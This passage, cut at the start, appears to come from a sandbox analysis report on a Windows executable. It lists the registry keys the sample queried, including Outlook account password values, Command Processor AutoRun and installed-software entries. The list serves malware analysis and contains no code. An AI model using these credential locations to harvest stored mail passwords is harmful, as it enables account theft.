Summary\NNTP Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\IMAP Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\IMAP User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\HTTP User HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\HTTP Server URL HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\POP3 User HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\IMAP User HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\HTTPMail User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\HTTPMail Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP User HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\POP3 Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\IMAP Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\NNTP Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\HTTPMail Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\POP3 Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\IMAP Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\NNTP Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\HTTP Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\POP3 Port HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP Port HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\IMAP Port HKEY_CURRENT_USER\Software\WinRAR\D13EAC51CD03EB893DE24FC827B8CDDB HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3512230a-fb0b-11e5-b945-806e6f6e6963}\ HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3512230a-fb0b-11e5-b945-806e6f6e6963}\Data HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3512230a-fb0b-11e5-b945-806e6f6e6963}\Generation HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122306-fb0b-11e5-b945-806e6f6e6963}\ HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122306-fb0b-11e5-b945-806e6f6e6963}\Data HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122306-fb0b-11e5-b945-806e6f6e6963}\Generation HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122307-fb0b-11e5-b945-806e6f6e6963}\ HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122307-fb0b-11e5-b945-806e6f6e6963}\Data HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122307-fb0b-11e5-b945-806e6f6e6963}\Generation HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Rpc HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\Compatibility\15757203.exe HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436} HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}\Enable HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90} HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{03B5835F-F03C-411B-9CE2-AA23E1171E36}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90} HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{07EB03D6-B001-41DF-9192-BF9B841EE71F}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90} HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{3697C5FA-60DD-4B56-92D4-74A569205C16}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90} HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{531FDEBF-9B4C-4A43-A2AA-960E8FCDC732}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90} HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{70FAF614-E0B1-11D3-8F5C-00C04F9CF4AC}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90} HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{78CB5B0E-26ED-4FCC-854C-77E8F3D1AA80}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90} HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{81D4E9C9-1D3B-41BC-9E6C-4B40BF79E35E}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90} HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{8613E14C-D0C0-4161-AC0F-1DD2563286BC}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90} HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{A028AE76-01B1-46C2-99C4-ACD9858AE02F}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90} HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{AE6BE008-07FB-400D-8BEB-337A64F7051F}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90} HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{C1EE01F2-B3B6-4A6A-9DDD-E988C088EC82}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90} HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{DCBD6FA8-032F-11D3-B5B1-00C04FC324A1}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90} HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90} HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{F25E9F57-2FC8-4EB3-A41A-CCE5F08541E6}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90} HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{F89E9E58-BD2F-4008-9AC2-0F816C09F4EE}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90} HKEY_CURRENT_USER HKEY_CURRENT_USER\Keyboard Layout\Toggle HKEY_CURRENT_USER\Keyboard Layout\Toggle\Language Hotkey HKEY_CURRENT_USER\Keyboard Layout\Toggle\Hotkey HKEY_CURRENT_USER\Keyboard Layout\Toggle\Layout Hotkey HKEY_CURRENT_USER\Software\Microsoft\CTF\DirectSwitchHotkeys HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\CTF\EnableAnchorContext HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\KnownClasses HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun HKEY_CURRENT_USER\Software\Microsoft\Command Processor HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Option
Read Keys
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SESSION MANAGER\SafeProcessSearchMode HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\932 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\949 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\950 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\936 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\Disable HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\DataFilePath HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane1 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane2 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane3 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane4 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane5 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane6 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane7 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane8 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane9 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane10 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane11 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane12 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane13 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane14 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane15 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane16 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORDISPLAY HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideFolderVerbs HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\UseDropHandler HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORPARSING HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsParseDisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForOverlay HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\MapNetDriveVerbs HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForInfoTip HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideInWebView HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideOnDesktopPerUser HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsAliasedNotifications HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsUniversalDelegate HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\NoFileFolderJunction HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\PinToNameSpaceTree HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HasNavigationEnum HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}\DriveMask HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player ActiveX\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player ActiveX\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player NPAPI\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player NPAPI\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Pillow-py2.7\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Pillow-py2.7\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1045AB6F-6151-3634-8C2C-EE308AA1A6A7}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1045AB6F-6151-3634-8C2C-EE308AA1A6A7}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2608539\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2689322\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2723430\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2821701\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2845370\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2890375\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{23daf363-3020-4059-b3ae-dc4ad39fed19}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{23daf363-3020-4059-b3ae-dc4ad39fed19}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83216022FF}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83216022FF}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83218074F0}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83218074F0}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\DisplayName 